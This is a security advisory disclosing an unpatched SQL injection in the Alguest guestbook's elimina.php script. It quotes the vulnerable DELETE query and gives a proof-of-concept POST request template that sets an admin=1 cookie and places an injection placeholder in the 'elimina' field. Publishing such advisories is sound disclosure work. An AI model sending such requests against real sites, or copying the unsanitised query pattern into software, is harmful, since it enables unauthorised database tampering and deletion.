www.eVuln.com advisory: "elimina" SQL Injection vulnerability in Alguest Summary: http://evuln.com/vulns/173/summary.html Details: http://evuln.com/vulns/173/description.html -----------Summary----------- eVuln ID: EV0173 Software: Alguest Vendor: n/a Version: 1.1c-patched Critical Level: medium Type: SQL Injection Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) --------Description-------- It is possible to inject arbitrary SQL query using "elimina" parameter in "elimina.php" script. Parameter "elimina" is used in SQL query without any sanitation. --------PoC/Exploit-------- SQL Injection Example Vulnerable code: $query = "DELETE FROM guest WHERE id=$elimina"; SQL Injection PoC: POST /alguest/elimina.php HTTP/1.0 Host: website Cookie: admin=1 Content-Length: N send=elimina&elimina=[SQL Injection] ---------Solution---------- Not available ----------Credit----------- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/ - how to secure website